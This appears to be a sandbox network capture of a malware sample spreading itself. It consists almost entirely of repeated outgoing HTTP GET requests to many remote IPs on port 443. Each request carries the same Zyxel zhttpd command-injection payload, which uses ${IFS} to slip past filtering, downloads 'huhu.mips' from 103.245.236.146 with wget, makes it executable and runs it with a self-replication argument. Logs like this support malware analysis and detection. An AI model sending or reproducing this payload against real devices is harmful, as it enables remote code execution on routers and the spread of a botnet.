                                      Jan 19, 2024 17:29:41.965842962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6775192.168.2.1458050216.102.25.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965897083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6776192.168.2.1433986106.4.229.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965941906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6777192.168.2.1438692208.157.138.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.965966940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6778192.168.2.1440322212.252.157.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966018915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6779192.168.2.143283443.71.8.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966073990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6780192.168.2.1441744101.155.239.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966114998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6781192.168.2.144461452.205.5.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966131926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6782192.168.2.1439716146.11.63.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966187000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6783192.168.2.145661264.67.196.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966203928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6784192.168.2.14529544.9.25.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966270924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6785192.168.2.145153420.176.201.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966305017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6786192.168.2.146035869.50.222.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966346025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6787192.168.2.1447470162.212.132.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966372013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6788192.168.2.14553044.13.36.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966403008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6789192.168.2.1458346165.188.64.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966459036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6790192.168.2.145540674.217.125.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966501951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6791192.168.2.144466072.41.253.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966533899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6792192.168.2.1441292102.207.140.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966567039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6793192.168.2.1453258131.225.179.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966600895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6794192.168.2.1437964208.109.46.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966645956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6795192.168.2.1433508201.234.125.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966684103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6796192.168.2.1453346169.202.97.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966715097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6797192.168.2.1457428123.42.113.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966763973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6798192.168.2.143937241.2.243.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966799974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6799192.168.2.1460104145.169.98.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966851950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6800192.168.2.1453082128.117.109.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966901064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6801192.168.2.1452476130.82.48.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966942072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6802192.168.2.1442968178.228.91.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.966978073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6803192.168.2.1453414145.239.88.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967025995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6804192.168.2.1437600103.62.139.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967060089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6805192.168.2.1456458113.24.135.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967082024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6806192.168.2.144412867.195.93.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967125893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6807192.168.2.144683464.111.107.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967178106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6808192.168.2.1436408121.130.190.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967183113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6809192.168.2.1453026111.22.115.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967247963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6810192.168.2.1437298199.77.119.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:41.967288017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6811192.168.2.1440434116.195.205.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978738070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6812192.168.2.1452790173.164.253.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978754044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6813192.168.2.1459118108.170.214.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978813887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6814192.168.2.1436744193.17.41.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978858948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6815192.168.2.1449148140.248.77.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978878021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6816192.168.2.1449124120.16.60.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978919029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6817192.168.2.1433598179.158.202.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.978972912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6818192.168.2.14455468.100.21.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979020119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6819192.168.2.1452578160.214.151.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979043961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6820192.168.2.1456462201.48.144.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979079962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6821192.168.2.1458104159.241.191.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979103088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6822192.168.2.146016213.241.162.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979173899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6823192.168.2.144644486.242.59.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979226112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6824192.168.2.1443846213.152.234.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979250908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6825192.168.2.1460308168.116.230.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979295015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6826192.168.2.143715896.222.217.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979332924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6827192.168.2.145501091.218.124.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979383945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6828192.168.2.1433312136.52.2.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979439020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6829192.168.2.1448576172.128.131.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979473114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6830192.168.2.1444552108.168.82.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979515076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6831192.168.2.145463076.3.64.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979546070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6832192.168.2.144880063.146.174.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979612112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6833192.168.2.14357264.42.29.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979650021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6834192.168.2.145136045.63.0.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979688883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6835192.168.2.145915636.132.207.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979710102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6836192.168.2.1440922172.88.181.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979758024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6837192.168.2.1436152129.166.58.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979792118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6838192.168.2.14531301.209.134.210443
                                      TimestampBytes transferredDirectionData
